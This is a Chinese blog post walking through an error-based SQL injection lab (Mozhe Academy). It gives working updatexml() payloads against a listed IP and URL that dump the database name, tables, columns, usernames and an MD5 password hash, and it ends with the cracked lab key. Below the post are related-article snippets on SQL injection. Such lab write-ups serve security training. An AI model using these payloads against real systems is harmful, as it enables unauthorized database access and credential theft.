SQL注入漏洞测试(报错盲注)

最新推荐文章于 2024-07-18 16:03:47 发布
最新推荐文章于 2024-07-18 16:03:47 发布
阅读量1.1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36933272/article/details/100171820
版权

1.判断注入,输入’显示语法错误说明有注入点

2.爆数据库

http://219.153.49.228:44996/new_list.php?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+

3.爆表

http://219.153.49.228:44996/new_list.php?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = ‘stormgroup’ limit 0,1),0x7e),1)–+

4.爆字段名

http://219.153.49.228:44996/new_list.php?id=1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = ‘stormgroup’ and table_name = ‘member’),0x7e),1)–+

5.爆用户名

http://219.153.49.228:44996/new_list.php?id=1’ and updatexml(1,concat(0x7e,(select name from member limit 0,1),0x7e),1)–+

6.爆字段值,password里因为~占了一个位数,所以需要把最后一位单独截出来
http://219.153.49.228:44996/new_list.php?id=1’ and updatexml(1,concat(0x7e,(select name from member limit 1,1),0x7e),1)–+
http://219.153.49.228:44996/new_list.php?id=1’ and updatexml(1,concat(0x7e,(select password from member limit 1,1),0x7e),1)–+
http://219.153.49.228:44996/new_list.php?id=1’ and updatexml(1,concat(0x7e,(select substr(password,32,1) from member limit 1,1),0x7e),1)–+
拼接起来:~3784ad971537a98e168be3888f10079c
md5解密得到密码,进入系统得到key:mozhe196b44e8fa7e3295b42d8227330

qq_36933272
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 718
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院-SQL注入漏洞测试(报错盲注)
qq_47094508的博客
06-21 329
拿到靶场后访问在用户登陆下方点击关于平台停机维护的通知点击后发现url为 http://124.70.71.251:46004/new_list.php?id=1添加单引号后报错,发现数据库为mariaDB 直接sqlmap一把梭就行了爆库名 爆表名 爆字段名 爆name和password的内容 解密 md5在线解密破解,md5解密加密 登录成功...
SQL注入原理-报错盲注
T1ngSh0w的博客
09-14 923
SQL注入-报错盲注(updatexml()函数与extractvalue()函数)
SQL注入报错盲注(墨者学院)
waxcj的博客
05-02 2941
首先我们先来了解一下报错注入的基本概念 1:报错注入定义 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 2:报错注入前提 页面上没有回显点,但是必须有SQL语句执行错误的信息。 3:报错注入优缺点 优点:不需要显示位,如果有显示位建议使用union联合查询。 缺点:需要有SQL语句的报错信息。 4:构造报错注入的基本步骤 构造目标查询语句 选择报错注入函数 构造报错注入语句 拼接报错注入语句 5:常见的报错注入函数 updatexml(
skywalking SQL注入 (CVE-2020-9483)
最新发布
qq_23003811的博客
07-18 224
当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。Apache SkyWalking是美国阿帕奇软件(Apache Software)基金会的一款主要用于微服务、云原生和基于容器等环境的应用程序性能监视器。2、使用burp抓包,重放/graphql的post请求。1、访问目录/graphql。3、提交payload。
sql报错注入:extractvalue、updatexml报错原理
weixin_33881140的博客
03-07 464
报错注入:extractvalue、updatexml报错原理 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的两个函数:extractvalue、updatexml 名称 描述 ExtractValue() 使用XPath表示法从XML字符串中提取值 UpdateXML() 返回替换的XML片段 通过这两个函数可以完成...
墨者学院11 SQL注入漏洞测试(报错盲注)
weixin_42789937的博客
02-21 369
墨者学院11 SQL注入漏洞测试(报错盲注),相比之前流程一致,使用updatexml()语句查询~
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **查询方式**: 1. **SELECT查询**:通常用于从数据库中检索数据,例如`select * from news where id=$id`。这里的...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让...
PHPCMS2008广告模板SQL注入漏洞修复
12-19
1. **SQL注入漏洞概述**: SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意构造的SQL代码,欺骗系统执行非预期的数据库操作。在这种情况下,PHPCMS2008广告模块在处理广告展示时,未对用户可控的referer字段...
SQL注入漏洞演示源代码
01-26
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的...
SQL注入思路详解
12-14
2. **SQL注入语句测试**:在测试阶段,攻击者会使用各种payload(即注入的SQL代码片段)来探测系统是否对SQL注入敏感。由于很多网站有WAF(Web应用防火墙)或代码级别的过滤器,测试时通常会选择最简单的payload,如...
SQL注入漏洞-SQL盲注
HacHunter的博客
03-05 781
盲注,从字面意思理解就是看不见的注入,其实这还是属于注入的一种,只是表现形式不同。盲注是不能通过直接显示的途径来获取数据库数据的方法。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。也就是说执行插入的语句后,不管是否执行,是否成功,都不会回显详细的错误信息,不像普通注入一样那么容易判断。但是,注入攻击还是发生了,只是错误信息被屏蔽掉了,请记住这个就好。一般情况下,盲注可分为三类: Booleanbase普通盲注 Timebase 基于时间的...
WEB漏洞-SQL注入报错盲注
ran的博客
01-16 660
内容包括导图、引论,SQL盲注的方法:报错盲注(insert报错盲注、update报错盲注、delete报错盲注)、时间盲注、布尔盲注,从基础内容开始,与实例结合,由浅到深的介绍了各种盲注方法的原理以及盲注过程,用到的实例包括pikachu、SQLi-LABS等,同时介绍了常用的SQL语句的用法,对盲注过程中用到的各种函数也进行了简单明了的介绍。
SQL注入报错盲注详解
DM766924的博客
09-15 1815
报错显示的原理: 前提:MYSQL报错信息必须能够在页面回显。原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息。要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用。分类: 基于group by报错注入 基于xpath函数报错注入(5.1.1及以上,extractvalue和updatexml) 基于double数值类型超出范围报错注入(5.5.5及以上) 基于bignt溢出报错注入 基于数据重复性报错注入 报
墨者学院-SQL注入漏洞测试报错盲注
weixin_42939822的博客
03-30 5153
墨者学院-SQL注入漏洞测试报错盲注
SQL注入漏洞——sql盲注
xiaoheizi的博客
06-12 432
sleep(5) #SQL语句延时执行5秒 substr(a,b,c) #从位置b开始,截取字符串a的c长度 left(database(),1) #left(a,b)从左侧截取a的前b位 length(database())=8 #判断数据库database()名的长度
mysql盲注_二十八、MySQL盲注
weixin_39990401的博客
01-18 282
在学习本实验之前,请确保已经学过“SQL注入原理与实践”这个实验。在 SQL注入原理与实践 这个实验中,我们已经知道了SQL注入的原理,并且能够完成支持union 且有回显的注入,这种情况是最简单的,最容易注入的,那么,如果注入点发生在update、insert等这些不会有返回内容而仅仅只返回true或者false的 SQL语句中,或者仅仅select而没有输出查询的内容时,是不是就不能获取数据了...
SQL注入详解:查询方式、报错盲注与实战技巧
"本文介绍了WEB漏洞中的SQL注入问题,特别是针对查询方式及报错盲注的技巧。内容包括Access偏移注入、SQL语句的基本查询、插入、删除和更新操作,以及不同类型的SQL盲注方法,如布尔盲注、时间盲注报错盲注。" 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值